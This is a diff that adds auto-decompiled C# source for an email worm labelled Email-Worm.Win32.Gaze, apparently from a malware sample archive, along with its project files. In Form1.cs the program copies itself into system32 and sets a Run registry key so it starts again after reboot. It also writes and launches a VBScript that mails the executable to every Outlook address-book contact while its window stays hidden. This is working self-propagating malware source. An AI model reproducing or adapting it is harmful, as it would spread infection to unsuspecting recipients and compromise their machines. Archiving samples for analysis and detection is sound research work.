auto-decompiled msil via petikvx

add

MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/AssemblyInfo.cs

@@ -0,0 +1,13 @@
+using System.Reflection;
+
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyKeyFile("")]
+[assembly: AssemblyDelaySign(false)]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyKeyName("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyVersion("1.0.997.22053")]

MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Email-Worm.Win32.Gaze.csproj

@@ -0,0 +1,45 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{63D73A47-01DC-4D91-B0DD-B30751C596FE}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>game</AssemblyName>
+    <ApplicationVersion>1.0.997.22053</ApplicationVersion>
+    <RootNamespace>game</RootNamespace>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Drawing" />
+    <Reference Include="System.Windows.Forms" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Form1.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <EmbeddedResource Include="Form1.resx" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Email-Worm.Win32.Gaze.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "game", "Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.csproj", "{63D73A47-01DC-4D91-B0DD-B30751C596FE}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Form1.cs

@@ -0,0 +1,83 @@
+// Decompiled with JetBrains decompiler
+// Type: game.Form1
+// Assembly: game, Version=1.0.997.22053, Culture=neutral, PublicKeyToken=null
+// MVID: C1B9288B-F130-4335-97F2-0FD15B3024FA
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe
+
+using Microsoft.Win32;
+using System;
+using System.ComponentModel;
+using System.Diagnostics;
+using System.Drawing;
+using System.IO;
+using System.Windows.Forms;
+
+namespace game
+{
+  public class Form1 : Form
+  {
+    private Container components = (Container) null;
+    private RegistryKey key = Registry.LocalMachine;
+    private RegistryKey key1;
+
+    public Form1()
+    {
+      this.InitializeComponent();
+      try
+      {
+        if (!File.Exists("c:\\WINNT\\system32\\game.exe"))
+        {
+          File.Copy(Directory.GetCurrentDirectory() + "\\game.exe", "c:\\WINNT\\system32\\game.exe", true);
+          this.key1 = this.key.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
+          this.key1.SetValue("msdosie", (object) "c:\\WINNT\\system32\\game.exe");
+          this.key1.Close();
+        }
+        FileStream fileStream = new FileStream("c:\\WINNT\\system32\\mail.vbs", FileMode.Create, FileAccess.Write, FileShare.Write);
+        StreamWriter streamWriter = new StreamWriter((Stream) fileStream);
+        streamWriter.WriteLine("'On Error Resume Next");
+        streamWriter.WriteLine("Set objOA=Wscript.CreateObject(\"Outlook.Application\")");
+        streamWriter.WriteLine("Set objMapi=objOA.GetNameSpace(\"MAPI\")");
+        streamWriter.WriteLine("For i=1 to objMapi.AddressLists.Count");
+        streamWriter.WriteLine("Set objAddList=objMapi.AddressLists(i)");
+        streamWriter.WriteLine("For j=1 To objAddList. AddressEntries.Count");
+        streamWriter.WriteLine("Set objMail=objOA.CreateItem(0)");
+        streamWriter.WriteLine("objMail.Recipients.Add objAddList.AddressEntries(j)");
+        streamWriter.WriteLine("objMail.Subject=\"faze\"");
+        streamWriter.WriteLine("objMail.Body=\"How are you today?\"");
+        streamWriter.WriteLine("objMail.Attachments.Add \"c:\\WINNT\\system32\\game.exe\"");
+        streamWriter.WriteLine("objMail.Send");
+        streamWriter.WriteLine("Next");
+        streamWriter.WriteLine("Next");
+        streamWriter.WriteLine("Set objMapi=Nothing");
+        streamWriter.WriteLine("Set objOA=Nothing");
+        streamWriter.Flush();
+        streamWriter.Close();
+        fileStream.Close();
+        Process.Start("c:\\WINNT\\system32\\mail.vbs");
+      }
+      catch
+      {
+      }
+    }
+
+    protected override void Dispose(bool disposing)
+    {
+      if (disposing && this.components != null)
+        this.components.Dispose();
+      base.Dispose(disposing);
+    }
+
+    private void InitializeComponent()
+    {
+      this.AutoScaleBaseSize = new Size(6, 14);
+      this.ClientSize = new Size(292, 273);
+      this.Name = nameof (Form1);
+      this.ShowInTaskbar = false;
+      this.Text = nameof (Form1);
+      this.WindowState = FormWindowState.Minimized;
+    }
+
+    [STAThread]
+    private static void Main() => Application.Run((Form) new Form1());
+  }
+}

MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Form1.resx

@@ -0,0 +1,123 @@
+<?xml version="1.0" encoding="utf-8"?>
+<root>
+  <!-- 
+    Microsoft ResX Schema 
+    
+    Version 2.0
+    
+    The primary goals of this format is to allow a simple XML format 
+    that is mostly human readable. The generation and parsing of the 
+    various data types are done through the TypeConverter classes 
+    associated with the data types.
+    
+    Example:
+    
+    ... ado.net/XML headers & schema ...
+    <resheader name="resmimetype">text/microsoft-resx</resheader>
+    <resheader name="version">2.0</resheader>
+    <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
+    <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
+    <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
+    <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
+    <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
+        <value>[base64 mime encoded serialized .NET Framework object]</value>
+    </data>
+    <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
+        <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
+        <comment>This is a comment</comment>
+    </data>
+                
+    There are any number of "resheader" rows that contain simple 
+    name/value pairs.
+    
+    Each data row contains a name, and value. The row also contains a 
+    type or mimetype. Type corresponds to a .NET class that support 
+    text/value conversion through the TypeConverter architecture. 
+    Classes that don't support this are serialized and stored with the 
+    mimetype set.
+    
+    The mimetype is used for serialized objects, and tells the 
+    ResXResourceReader how to depersist the object. This is currently not 
+    extensible. For a given mimetype the value must be set accordingly:
+    
+    Note - application/x-microsoft.net.object.binary.base64 is the format 
+    that the ResXResourceWriter will generate, however the reader can 
+    read any of the formats listed below.
+    
+    mimetype: application/x-microsoft.net.object.binary.base64
+    value   : The object must be serialized with 
+            : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
+            : and then encoded with base64 encoding.
+    
+    mimetype: application/x-microsoft.net.object.soap.base64
+    value   : The object must be serialized with 
+            : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
+            : and then encoded with base64 encoding.
+
+    mimetype: application/x-microsoft.net.object.bytearray.base64
+    value   : The object must be serialized into a byte array 
+            : using a System.ComponentModel.TypeConverter
+            : and then encoded with base64 encoding.
+    -->
+  <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
+    <xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
+    <xsd:element name="root" msdata:IsDataSet="true">
+      <xsd:complexType>
+        <xsd:choice maxOccurs="unbounded">
+          <xsd:element name="metadata">
+            <xsd:complexType>
+              <xsd:sequence>
+                <xsd:element name="value" type="xsd:string" minOccurs="0" />
+              </xsd:sequence>
+              <xsd:attribute name="name" use="required" type="xsd:string" />
+              <xsd:attribute name="type" type="xsd:string" />
+              <xsd:attribute name="mimetype" type="xsd:string" />
+              <xsd:attribute ref="xml:space" />
+            </xsd:complexType>
+          </xsd:element>
+          <xsd:element name="assembly">
+            <xsd:complexType>
+              <xsd:attribute name="alias" type="xsd:string" />
+              <xsd:attribute name="name" type="xsd:string" />
+            </xsd:complexType>
+          </xsd:element>
+          <xsd:element name="data">
+            <xsd:complexType>
+              <xsd:sequence>
+                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
+                <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
+              </xsd:sequence>
+              <xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
+              <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
+              <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
+              <xsd:attribute ref="xml:space" />
+            </xsd:complexType>
+          </xsd:element>
+          <xsd:element name="resheader">
+            <xsd:complexType>
+              <xsd:sequence>
+                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
+              </xsd:sequence>
+              <xsd:attribute name="name" type="xsd:string" use="required" />
+            </xsd:complexType>
+          </xsd:element>
+        </xsd:choice>
+      </xsd:complexType>
+    </xsd:element>
+  </xsd:schema>
+  <resheader name="resmimetype">
+    <value>text/microsoft-resx</value>
+  </resheader>
+  <resheader name="version">
+    <value>2.0</value>
+  </resheader>
+  <resheader name="reader">
+    <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
+  </resheader>
+  <resheader name="writer">
+    <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
+  </resheader>
+  <data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
+    <value>BUZvcm0x</value>
+  </data>
+</root>